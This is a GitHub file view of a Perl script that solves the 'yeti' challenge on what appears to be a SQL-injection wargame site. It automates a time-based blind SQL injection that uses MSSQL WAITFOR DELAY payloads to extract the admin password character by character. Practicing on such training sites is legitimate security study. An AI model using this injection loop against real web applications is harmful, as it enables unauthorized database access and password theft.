-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy path43_yeti.pl
66 lines (53 loc) · 1.32 KB
/
43_yeti.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
$ENV{PERL_LWP_SSL_CA_FILE} = '/etc/ssl/cert.pem';
$|++;
my @charset = (
#33 .. 47, # !"#$%&'()*+,-./
48 .. 57, # 0-9
#58 .. 64, # :;<=>?@
#65 .. 70, # A-F
#97 .. 102, # a-f
#65 .. 90, # A-Z
#91 .. 96, # [\]^_`
97 .. 122, # a-z
#123 .. 126, # {|}~
);
my $url =
"https://los.rubiya.kr/chall/yeti_e6afc70b892148ced2d1e063c1230255.php"
;
my $cookie =
;
my $ua = LWP::UserAgent->new( timeout => 5 );
my $found = '';
my $index = 0;
while (1) { # unknown pwd length
$index++;
for my $ord (@charset) {
my $char = chr $ord;
print $char;
my $payload =
"?id=admin&pw=' if ((select pw from prob_yeti where id='admin') " .
"like '${found}${char}%25') WAITFOR DELAY '0:0:7' " .
"else WAITFOR DELAY '0:0:0'--"
;
CONN:
my $resp = $ua->get( $url.$payload, 'Cookie' => $cookie );
if ($resp->is_error) {
printf "\n[%d] %s\n", $resp->code, $resp->message;
if ($resp->code == 500 && $resp->message eq 'read timeout') {
$found .= $char;
print "\n$index => $char, Total: '$found'\n";
last;
} else {
redo CONN;
}
} else {
$found .= chr 219 if $index == $#charset; # last char and not found
}
}
}
# vim:sw=2:ts=2:sts=2:et:cc=80
# End of file